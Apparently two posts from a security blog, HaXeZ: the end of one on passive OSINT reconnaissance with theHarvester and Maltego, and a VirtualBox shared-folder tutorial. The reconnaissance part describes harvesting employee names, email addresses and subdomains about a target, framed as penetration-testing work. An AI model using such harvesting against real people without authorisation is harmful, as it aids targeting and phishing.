A tool that combines all of these techniques into one great command-line tool is the Harvester. The Harvester is a wrapper for other tools and can perform passive and active reconnaissance. It can use search engines to find subdomains and URLs. Additionally, It can use social media websites to find employee names and email addresses. To find the full list of tools utilized by theHarvester, head over to the developer’s GitHub page.

https://github.com/laramies/theHarvester

theHarvester
theHarvester

Conclusion

Passive reconnaissance can provide a wealth of information about a target that you are testing. While some of the information may be beyond the scope of the engagement, it can give you a good insight into their organization. The tools I’ve talked about above barely scrape the surface of the iceberg that is OSINT tools. Perhaps one day someone will create an and all in one, web-based OSINT scanner and it will become what Nessus is to vulnerability scans. I’m fond of Maltego and theHarvester and think they do a fantastic job but would love more functionality and a simpler interface. Input your domain, tick the boxes of what information you want to discover and then wait for the report.

Tips And Tricks: Virtual Machine Shared Folder

Dear Friend, thank you for visiting HaXeZ. Today I want to talk about creating a shared folder for your Virtual Machine. They are a useful feature that allows you to share files between your base operating system and your Virtual Machine. While Virtual Machines do have a bidirectional clipboard that allows you to copy to and from each machine. A shared folder allows for easy access to resources such as wordlists and other large files. Furthermore, they can be particularly useful if you have limited disk space on your Virtual Machine.

Creating A Folder

In VirtualBox, this is a fairly simple process. First, you need to select the Virtual Machine that you want to add the shared folder to and click settings.

Shared Folder Settings
Shared Folder Settings

Once the settings menu opens you need to navigate to the Shared Folders section in the left-hand column.

Adding Shared Folder
Adding Shared Folder

Next, click the blue folder icon with the green plus sign and that will pop up a window with a number of options.

Folder Options

The Folder Path option lets you select where on your base Operating System you want your folder to be. Folder Name allows you to give your folder a specific name when accessing it on your Virtual Machine. The Read-Only option prevents you from making changes to any of the files in the shared directory. Do not tick this if you want to be able to modify your folders. Auto-mount ensures that the folder is mounted on your Virtual Machine once it boots. You want to enable this option. Mount Point specifies where on the Virtual Machine you want it to mount. If you leave this empty then it should default to the /media directory.

Shared Folder Mount
Shared Folder Mount

Accessing Shared Folder

With the settings saved, boot your Virtual Machine and login to the Desktop Environment. Then launch your file manager or file explorer. On the left-hand side, you should see a Devices section containing your File System and your Shared Folder. If not then it could be that you haven’t installed your Virtual Box guest additions.

File Explorer
File Explorer

Permissions Issues

If you can see the folder but aren’t able to access or create any files then it is likely due to user permissions. In order to resolve this issue, you need to add your user to the VirtualBox users group. This can be done by running the following command.

sudo adduser $USER vboxsf

You should now be able to access the shared folder. It is unlikely that you will need to reboot the machine but if the problem persists then reboot and try again.